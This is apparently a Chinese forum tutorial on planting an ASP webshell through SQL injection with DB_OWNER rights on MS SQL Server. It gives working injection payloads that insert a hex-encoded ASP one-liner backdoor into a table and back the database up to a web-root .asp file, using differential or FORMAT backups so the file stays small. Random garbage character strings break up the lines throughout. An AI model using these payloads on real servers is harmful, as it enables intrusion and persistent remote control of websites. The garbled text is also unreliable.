DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
; I: N- c4 F4 I5 c一利用差异备份
$ V$ O4 {; _8 {8 j) Q加一个参数WITH DIFFERENTIAL
3 I" o! f8 z4 l  D3 Y* D6 o9 j  y
1
2
" O" }6 c7 F) ~1 F, O3
, V1 {; j  P+ R5 [' P4
: v: R' t0 p8 Z1 r% g5 k declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
; ?1 A' P1 S4 u2 O6 S6 Z/ kcreate table [dbo].[xiaolu] ([cmd] [image]);
5 M! J2 v# S4 H& {* J. binsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
9 A4 I. j9 U% c1 q" h加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

2 g' H: {- Y, l6 d4 w7 o/ G1
2
! P1 J  u" [+ h; Y% I' [5 Y  v3
  b! V1 v; |, o0 M% w/ l4
( b) N6 h- `7 U9 c  Y" A declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
" n* U& z+ x! c3 ^9 R/ g0 zcreate table [dbo].[xiaolu] ([cmd] [image]);
8 z; v, C- z# f$ R3 T7 F% S  Winsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( P' `  M/ C2 [2 Fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
: l% f5 N8 q& g8 c1
9 U  x: h% q( F. M) T6 o! y
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

( i& z" D4 {* I' ~& Q1 `2
3 i3 _- ?' e0 F% }8 c
1
" b# x* e4 K" P. L) v id=1;backup database model to disk='你的路径‘ with differential,format;--
8 H( ?+ ~8 A6 }( \